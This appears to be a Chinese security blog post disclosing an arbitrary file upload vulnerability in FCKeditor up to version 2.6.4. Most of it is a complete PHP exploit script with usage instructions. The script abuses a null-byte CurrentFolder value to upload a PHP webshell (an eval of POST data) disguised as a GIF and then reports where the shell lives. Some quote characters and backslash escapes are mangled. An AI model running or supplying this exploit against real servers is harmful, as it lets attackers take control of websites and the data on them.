0

fckeditor <= 2.6.4 任意文件上传漏洞

已有 3,185 人阅读此文 - -

fckeditor <= 2.6.4 任意文件上传漏洞

简要描述:

fckeditor <= 2.6.4 任意文件上传漏洞, php coldfunsion应该KO了,asp表示很淡定,其他语言版本未测

详细说明:

currentfolder过滤不给力啊,但是GPC就能让它脑残

代码<?

error_reporting(0);

set_time_limit(0);

ini_set(“default_socket_timeout”, 5);

define(STDIN, fopen(“php://stdin”, “r”));

$match = array();

function http_send($host, $packet)

{

$sock = fsockopen($host, 80);

while (!$sock)

{

print “n[-] No response from {$host}:80 Trying again…”;

$sock = fsockopen($host, 80);

}

fputs($sock, $packet);

while (!feof($sock)) $resp .= fread($sock, 1024);

fclose($sock);

print $resp;

return $resp;

}

function connector_response($html)

{

global $match;

return (preg_match(“/OnUploadCompleted((d),”(.*)”)/”, $html, $match) && in_array($match[1], array(0, 201)));

}

print “n+——————————————————————+”;

print “n| FCKEditor Servelet Arbitrary File Upload Exploit by Wolegequ     |”;

print “n+——————————————————————+n”;

if ($argc < 3)

{

print “nUsage……: php $argv[0] host pathn”;

print “nExample….: php $argv[0] localhost /n”;

print “nExample….: php $argv[0] localhost /FCKEditor/n”;

die();

}

$host = $argv[1];

$path = ereg_replace(“(/){2,}”, “/”, $argv[2]);

$filename  = “fvck.gif”;

$foldername = “fuck.php%00.gif”;

$connector = “editor/filemanager/connectors/php/connector.php”;

$payload  = “—————————–265001916915724rn”;

$payload .= “Content-Disposition: form-data; name=”NewFile”; filename=”{$filename}”rn”;

$payload .= “Content-Type:  image/jpegrnrn”;

$payload .= ‘GIF89a’.”rn”.'<?php eval($_POST[a]) ?>’.”n”;

$payload .= “—————————–265001916915724–rn”;

$packet = “POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=”.$foldername.” HTTP/1.0rn”;

//print $packet;

$packet .= “Host: {$host}rn”;

$packet .= “Content-Type: multipart/form-data; boundary=—————————265001916915724rn”;

$packet .= “Content-Length: “.strlen($payload).”rn”;

$packet .= “Connection: closernrn”;

$packet .= $payload;

print $packet;

if (!connector_response(http_send($host, $packet))) die(“n[-] Upload failed!n”);

else print “n[-] Job done! try http://${host}/$match[2] n”;

?>

0
相关文章!